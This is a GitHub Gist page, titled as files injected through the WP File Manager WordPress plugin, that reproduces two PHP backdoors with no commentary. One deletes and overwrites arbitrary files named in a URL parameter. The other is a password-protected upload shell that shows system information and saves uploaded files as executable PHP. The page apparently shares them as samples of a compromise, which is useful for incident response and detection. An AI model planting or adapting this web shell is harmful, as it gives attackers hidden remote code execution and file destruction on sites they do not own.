Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
WP FIle Manager injected files
<?php
if(isset($_GET['name'])){
if(function_exists("unlink")){
@unlink($_GET['name']);
@unlink($_GET['name']);
@unlink($_GET['name']);
@unlink($_GET['name']);
@unlink($_GET['name']);
}
$save=fopen($_GET['name'],"w");
fwrite($save,"bajatax");
fclose($save);
}
?>
<?php echo 'PRIVET BOT BY BAJ'.'ATAX '.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> <input type="password" name="baja_xsam" value="sirt7wa"></form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads']) and md5(md5(md5($_POST["baja_xsam"]))) == "ddb0bfc94159c6ac960367ef994ae246"
) { move_uploaded_file($_FILES['uploads']['tmp_name'],md5(time()).".php"); Echo "<b>Uploaded !!!</b><br>name : ".md5(time()).".php"."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment